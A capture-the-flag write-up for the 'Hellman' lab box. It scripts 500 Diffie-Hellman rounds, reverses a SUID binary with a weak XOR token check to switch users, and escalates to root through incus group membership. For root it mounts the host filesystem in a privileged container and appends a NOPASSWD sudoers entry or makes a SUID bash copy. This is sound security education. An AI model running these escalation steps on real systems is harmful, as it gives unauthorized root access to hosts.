Mazesec_Hellman

Box source: QQ group 660930334

Difficulty: Easy

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:01 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00057s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00067s latency).
MAC Address: 08:00:27:71:57:99 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.60
Host is up (0.00094s latency).
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)
Stats: 0:00:07 elapsed; 255 hosts completed (3 up), 255 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.51 seconds

Target IP: 192.168.2.60

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.60
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:02 +0800
Nmap scan report for 192.168.2.60
Host is up (0.00063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds

Open ports: 22, 80, 1337

2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,1337 192.168.2.60
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:02 +0800
Nmap scan report for 192.168.2.60
Host is up (0.0017s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: Diffie-Hellman Challenge Guide
1337/tcp open waste?
| fingerprint-strings:
| GenericLines, NULL:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 39883204222858856918557640435344745890513425125290039851563654356835662268498
| 224638392781010346795674419563132197430625052467062663656728020806452536513319721055074207335278925919928267028716364525781824472324432672098280141614523807650997041044044996580695734531375627561478894572919232085682056248754553
| GetRequest:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 30659261933364259369132068323793156534865584845264382299796372358262839566253
|_ 141857959155456004789209623147729647056961948062733887997137635919822708590999302708538583075539897493266262709687118908656475132467268775267767813200521394686273807598087086012147629209008628488571390034369609577109391080455020
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.52 seconds

II. Web

1. Port 80

Browsing to port 80 shows a Diffie-Hellman Key Exchange challenge guide: the exchange has to be completed 500 times, so it needs to be scripted, and the service is reached with nc hellman.dsz 1337.

III. Diffie-Hellman

Connect to port 1337 with nc:

┌──(root㉿kali)-[~/miaosec]
└─# nc 192.168.2.60 1337
Alice has sent you her public key.
You've also been given your private key.
Now calculate your shared secret.

g = 2
p = 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919

b = 51154570168425237012190187261208452554935228966342909476175478257010034448854
A = 1810096577306243736581942011207190129532077359040013432015086489684205815534398460549275846332291790537384649787817466650218512598949970197232507513372720069383980178553518222604140035165806150793414342893343137096664748831497856441434056477271196223931376386008074303053540618281394821915277589825901885193302437264716584784840559143099754318836327577637969351350571153233730788109044478376649815836540623348562572608183613314000872264170553433293147256838513298
>

We need to compute the shared secret. Testing shows that from the second round on only b and A change (g and p stay the same), so I had an AI write a script:

from pwn import *

HOST = "192.168.2.60"
PORT = 1337
context.timeout = 10

io = remote(HOST, PORT)

def read_round1():
    """Round 1: we need p, b and A (g is always 2)."""
    p = b = A = None
    while p is None or b is None or A is None:
        line = io.recvline().decode().strip()
        print(f"[R1] {repr(line)}")
        if line.startswith("p = "):
            p = int(line.split("= ", 1)[1])
        elif line.startswith("b = "):
            b = int(line.split("= ", 1)[1])
        elif line.startswith("A = "):
            A = int(line.split("= ", 1)[1])
    return p, b, A

def read_next_round():
    """Rounds 2+: only b and A change, p is reused from round 1."""
    b = A = None
    while b is None or A is None:
        line = io.recvline().decode().strip()
        print(f"[RN] {repr(line)}")
        if line.startswith("b = "):
            b = int(line.split("= ", 1)[1])
        elif line.startswith("A = "):
            A = int(line.split("= ", 1)[1])
        # every other line (blank lines, '> Correct!', ...) is ignored
    return b, A

# ===== Round 1 =====
print("[*] Round 1")
p, b, A = read_round1()
S = pow(A, b, p)            # shared secret: S = A^b mod p
io.sendline(str(S).encode())
print("[+] Round 1 done\n")

# ===== Rounds 2-500 =====
for round_num in range(2, 501):
    print(f"[*] Round {round_num}")
    b, A = read_next_round()
    S = pow(A, b, p)
    io.sendline(str(S).encode())
    print(f"[+] Round {round_num} done")

# ===== Flag =====
flag = io.recvall(timeout=5).decode()
print("\n🎉 FLAG:")
print(flag)
io.close()

The script runs successfully:

....
[*] Round 500
[RN] '> Correct!'
[RN] ''
[RN] 'b = 42728238619645625108491187911580118051476472226993498679467817687962515190795'
[RN] 'A = 2391650150985810884994252685859052787801002187688383438918665064733694948779829365616769020651185586237016153481579544226505297708534405745415478700876478921519692405489708997678205836809697355276663326790382326219115224747787261227196132927251137819849881628026643338479934731670469291841859715749238574933045977981386216912009600066142619622484806914716407600488851876082111562196867608104366105761718540613179786077858885557393101122979407282875569450246185227'
[+] Round 500 done
[+] Receiving all data: Done (81B)
[*] Closed connection to 192.168.2.60 port 1337

🎉 FLAG:
> Correct!

Congrats! Here's the flag: 676f643a6e756d626572735f6172655f68617264

We get the string 676f643a6e756d626572735f6172655f68617264.

It is hex-encoded; decoding it gives god:numbers_are_hard.
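As an added illustration (not part of the original writeup or the challenge's code), here are both sides of the exchange the service runs: a parser for its message format, the client's S = A^b mod p step with a check that Alice's public value is not degenerate, and a simulated Alice so the two secrets can be compared. The group is a constructed small safe prime with g = 2 (the real p from the service can be passed in instead), and every function and class name below is this example's own.

```python
import re
import secrets
# Constructed demo group: g = 2 as in the challenge, but a small safe prime
# p = 2039 (= 2*1019 + 1) instead of the service's 2048-bit p (the real p works too).
G = 2
P_DEMO = 2039
PARAM_RE = re.compile(r"^([gpbA]) = (\d+)$", re.MULTILINE)

def private_exponent(p):
    """Exponent in [1, (p-1)/2 - 1]: for a safe prime never gives A = 1 or p-1."""
    return secrets.randbelow((p - 1) // 2 - 1) + 1

def parse_message(text, known=None):
    """Parse one service message into {g, p, b, A}.  Later rounds print only
    b and A, so g and p come from `known`; '> Correct!' and blanks are ignored."""
    params = dict(known or {})
    for name, value in PARAM_RE.findall(text):
        params[name] = int(value)
    missing = [k for k in ("g", "p", "b", "A") if k not in params]
    if missing:
        raise ValueError("message lacks " + ", ".join(missing))
    return params

def shared_secret(params):
    """Client side: S = A^b mod p, after rejecting degenerate public values."""
    p, A, b = params["p"], params["A"], params["b"]
    if not 1 < A < p - 1:
        raise ValueError("public key outside (1, p-1)")
    return pow(A, b, p)

class Alice:
    """Simulated server side: fresh private a per round, publishes A = g^a mod p."""
    def __init__(self, p, g):
        self.p, self.g = p, g
    def new_round(self):
        self.a = private_exponent(self.p)
        return pow(self.g, self.a, self.p)
    def secret_from(self, B):
        return pow(B, self.a, self.p)          # S = B^a mod p

def build_message(A, b, first, p, g):
    """Render one round in the service's own text format (constructed transcript)."""
    head = "> Correct!\n\n"
    if first:
        head = ("Alice has sent you her public key.\nYou've also been given your "
                f"private key.\nNow calculate your shared secret.\n\ng = {g}\np = {p}\n\n")
    return head + f"b = {b}\nA = {A}\n"

def run_rounds(n, p=P_DEMO, g=G):
    """Drive n rounds; True iff the client's S matches Alice's S every time."""
    alice, known = Alice(p, g), None
    for i in range(n):
        A = alice.new_round()
        b = private_exponent(p)                # the private key the service hands us
        params = parse_message(build_message(A, b, i == 0, p, g), known)
        known = {"g": params["g"], "p": params["p"]}
        if shared_secret(params) != alice.secret_from(pow(g, b, p)):
            return False
    return True
```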

IV. Getting a shell as god

The recovered credentials log in over SSH:

┌──(root㉿kali)-[~]
└─# ssh god@192.168.2.60
The authenticity of host '192.168.2.60 (192.168.2.60)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:14: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.60' (ED25519) to the list of known hosts.
god@192.168.2.60's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Hellman:~$ id
uid=1001(god) gid=1001(god) groups=1001(god)

V. Privilege escalation

1. Getting water

List the SUID binaries:

Hellman:~$ find / -perm -4000 -type f 2>/dev/null
/bin/bbsuid
/usr/libexec/dbus-daemon-launch-helper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/secure_auth
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn

/usr/bin/secure_auth is not a standard binary and looks suspicious.

Run it:

Hellman:~$ /usr/bin/secure_auth 
Usage: /usr/bin/secure_auth <command> <token>

It needs two arguments: <command>, the command to execute, and <token>.

Decompiling the binary gives this pseudocode:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v4; // rdx
  char *s; // [rsp+10h] [rbp-120h]
  const char *s1; // [rsp+18h] [rbp-118h]
  char s2[264]; // [rsp+20h] [rbp-110h] BYREF
  unsigned __int64 v8; // [rsp+128h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  if ( argc > 2 )
  {
    s = (char *)argv[1];                 // <command>
    s1 = argv[2];                        // <token>
    xor_cipher(s, key, s2);              // s2 = command XOR built-in key
    v4 = strlen(s);
    if ( !memcmp(s1, s2, v4) )           // token compared over strlen(command) bytes only
    {
      puts("[+] Auth successful. Switching to UID 1002...");
      if ( setresgid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresgid failed");
      if ( setresuid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresuid failed");
      system(s);                         // runs the command as uid/gid 1002
    }
    else
    {
      puts("[-] Auth failed.");
    }
    return 0;
  }
  else
  {
    printf("Usage: %s <command> <token>\n", *argv);
    return 1;
  }
}

Overall flow

  1. The user runs the program: ./secure_auth "command" "token"
  2. The program XORs "command" with the built-in key, giving token1
  3. token1 is compared with the supplied token
  4. If they match, it switches to UID/GID 1002 and executes "command" (note that the token is passed as raw bytes)

The key is found in the binary: key=4b077130fw473r

The xor_cipher function:

_BYTE *__fastcall xor_cipher(const char *a1, const char *a2, __int64 a3)
{
  _BYTE *result; // rax
  int i; // [rsp+24h] [rbp-Ch]
  int v6; // [rsp+28h] [rbp-8h]
  int v7; // [rsp+2Ch] [rbp-4h]

  v6 = strlen(a1);                                 // input length
  v7 = strlen(a2);                                 // key length
  for ( i = 0; i < v6; ++i )
    *(_BYTE *)(i + a3) = a2[i % v7] ^ a1[i];       // repeating-key XOR into the output buffer
  result = (_BYTE *)(v6 + a3);
  *result = 0;                                     // NUL-terminate the output
  return result;
}

Again I had an AI write a small program to derive the token:

// main.cpp
#include <iostream>
#include <cstring>
#include <cstdio>

typedef unsigned char BYTE;

// Same logic as the binary's xor_cipher, with a clearer signature: the output buffer is passed in explicitly
BYTE* xor_cipher(const char* plaintext, const char* key, BYTE* output) {
    if (!plaintext || !key || !output) return nullptr;
    size_t len = strlen(plaintext);
    size_t key_len = strlen(key);
    if (key_len == 0) return nullptr;

    for (size_t i = 0; i < len; ++i) {
        output[i] = static_cast<BYTE>(plaintext[i] ^ key[i % key_len]);
    }
    output[len] = 0; // null-terminate as string
    return output + len;
}

int main() {
    const char* msg = "sh";
    const char* key = "4b077130fw473r";
    BYTE buffer[256] = {0};

    xor_cipher(msg, key, buffer);

    std::cout << "Encrypted bytes: ";
    for (size_t i = 0; i < strlen(msg); ++i) {
        printf("%02X ", buffer[i]);
    }
    std::cout << "\n";

    // decrypt (XOR is symmetric)
    BYTE decrypted[256] = {0};
    xor_cipher(reinterpret_cast<const char*>(buffer), key, decrypted);
    std::cout << "Decrypted: " << decrypted << "\n";

    return 0;
}


Output: Encrypted bytes: 47 0A; Decrypted: sh

Running it with that token switches to the water user. 💡 Note: the token has to be passed as raw bytes, hence the $'\x47\x0a' quoting (0x0a is a newline).

Hellman:~$ /usr/bin/secure_auth "sh" $'\x47\x0a'
[+] Auth successful. Switching to UID 1002...
~ $ id
uid=1002(water) gid=1002(water) groups=1001(god)

2. Getting root

Look at .ash_history in /home/water:

~ $ cat .ash_history 
incus
ls -l /var/lib/incus/unix.socket
addgroup god incus
exit

This suggests the water user has been added to the god and incus groups.

Check /etc/group:

~ $ cat /etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin
adm:x:4:root,daemon
tty:x:5:
disk:x:6:root
lp:x:7:lp
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
cron:x:16:cron
audio:x:18:
cdrom:x:19:
dialout:x:20:root
ftp:x:21:
sshd:x:22:
input:x:23:
tape:x:26:root
video:x:27:root
netdev:x:28:
kvm:x:34:kvm
games:x:35:
shadow:x:42:
www-data:x:82:nginx
users:x:100:games
ntp:x:123:
abuild:x:300:
utmp:x:406:
ping:x:999:
nogroup:x:65533:
nobody:x:65534:
klogd:x:101:klogd
nginx:x:102:nginx
docker:x:103:
alice:x:1000:
god:x:1001:
messagebus:x:104:messagebus
dnsmasq:x:105:dnsmasq
incus:x:106:water
incus-user:x:107:
incus-admin:x:108:
water:x:1002:

The line incus:x:106:water shows that water is a member of the incus group.

But groups does not list incus. 📌 Linux decides permissions on the credentials the process carries (what id / groups shows), not on the text of /etc/group.

~ $ groups
water god

The group list has to be refreshed for incus to take effect, but there is no newgrp on the box.
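An added helper (not from the original post) that makes the difference concrete: it compares the membership written in /etc/group with the group list the live session reports, flagging groups granted on disk but not yet effective and groups the session holds without the file granting them. The group-file excerpt is constructed from the lines above, and the names GROUP_FILE, file_groups and audit_groups are this example's own.

```python
# Constructed excerpt of this box's /etc/group (only the lines that matter here).
GROUP_FILE = """\
root:x:0:root
wheel:x:10:root
god:x:1001:
incus:x:106:water
incus-admin:x:108:
water:x:1002:
"""

def file_groups(group_text, user):
    """Groups whose member field in /etc/group lists `user`: the supplementary
    membership as configured on disk."""
    granted = set()
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4 or not fields[0] or fields[0].startswith("#"):
            continue
        if user in [m for m in fields[3].split(",") if m]:
            granted.add(fields[0])
    return granted

def audit_groups(group_text, user, primary, live_groups):
    """Compare on-disk membership with what a running session actually holds.

    `live_groups` is the output of `groups` / `id -Gn` in that session and
    `primary` the user's login group from /etc/passwd.  Returns (stale, inherited):
      stale     - in /etc/group but not in the process credentials; takes effect
                  only after a fresh login (or newgrp/sg where available)
      inherited - in the process credentials but not granted by /etc/group, e.g.
                  carried over from a parent process that switched uid/gid
    """
    live = set(live_groups)
    granted = file_groups(group_text, user)
    return granted - live, live - granted - {primary}
```

For the session above, audit_groups(GROUP_FILE, "water", "water", ["water", "god"]) reports incus as stale and god as inherited from the secure_auth parent; after the SSH login it reports nothing.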

Logging in again over SSH starts a fresh session with the current group list, so set up key-based SSH login in water's home directory:

  1. Create the .ssh directory and authorized_keys file in water's home directory
  2. Make sure the permissions are strict (SSH is very picky about them)

1) Create the .ssh directory

~ $ mkdir -p ~/.ssh
~ $ chmod 700 ~/.ssh

2) Generate an SSH key pair

~ $ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/water/.ssh/id_ed25519):
Created directory '/home/water/.ssh'.
Enter passphrase for "/home/water/.ssh/id_ed25519" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/water/.ssh/id_ed25519
Your public key has been saved in /home/water/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:exhBe72E5vvKS+l4uqLv1az0fj69P1em4k35750bGOo water@Hellman
The key's randomart image is:
+--[ED25519 256]--+
| . |
| . . o |
| o + o |
| = . . |
| S . .. |
| * o. o.o|
| = B. oo+.|
| .o Oo.+ooo=|
| .+o.==BE+oo*@|
+----[SHA256]-----+
~/.ssh $ cat id_ed25519

3) Append the public key to authorized_keys

~/.ssh $ cat id_ed25519.pub >> ./authorized_keys
~/.ssh $ ls -la
total 24
drwx--S--- 2 water water 4096 Jan 28 17:32 .
drwxr-sr-x 5 water water 4096 Jan 28 17:32 ..
-rw------- 1 water water 95 Jan 28 17:32 authorized_keys
-rw------- 1 water water 399 Jan 28 17:28 id_ed25519
-rw------- 1 water water 95 Jan 28 17:28 id_ed25519.pub

4) Set strict permissions

~/.ssh $ chmod 600 id_ed25519.pub 
~/.ssh $ chmod 600 id_ed25519
~/.ssh $ chmod 600 authorized_keys

Logging in as water with the private key (saved as the file id on the attacking machine):

┌──(root㉿kali)-[~/miaosec]
└─# ssh water@192.168.2.60 -i id
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Hellman:~$ id
uid=1002(water) gid=1002(water) groups=106(incus),1002(water)

water now holds the incus group in its session credentials.

Privilege escalation via the incus group

  1. List the incus instances:
incus list
  2. Create a privileged container with the host's root filesystem mounted inside it:
incus init images:alpine/edge privesc
incus config set privesc security.privileged true
incus config device add privesc host-root disk source=/ path=/mnt/root recursive=true
  3. Start the container:
incus start privesc
  4. Enter the container and read/write the host filesystem directly:
incus exec privesc -- sh

# inside the container:
# cd /mnt/root
# echo "god ALL=(ALL) NOPASSWD:ALL" >> etc/sudoers
# or make a SUID copy of /bin/bash instead:
# cp bin/bash home/god/bash && chmod u+s home/god/bash

On the box (the first image name tried does not exist, alpine/edge does):
Hellman:~$ incus list
+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+
Hellman:~$ incus launch images:alpine/3.18/amd64 privesc -c security.privileged=true
Launching privesc
Error: Failed instance creation: Failed getting remote image info: Failed getting image: The requested image couldn't be found
Hellman:~$ incus init images:alpine/edge privesc
Creating privesc
Hellman:~$ incus config set privesc security.privileged true
Hellman:~$ incus config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
Hellman:~$ incus start privesc
Hellman:~$ incus exec privesc -- sh
~ # pwd
/root
/ # id
uid=0(root) gid=0(root)

VI. Reading the flags

/ # cd /mnt/root
/mnt/root # cat root/root.txt home/god/user.txt
flag{root-da3397afd8ca24ea5bcaf7a2cb83b422}
flag{user-c9461249ea2e074a338b82db919b3fb9}

Mazesec_Hellman
http://miao-sec.github.io/Maze-sec/Mazesec-Hellman/
Author: Miao
Published: 27 January 2026
License: BY-MIAO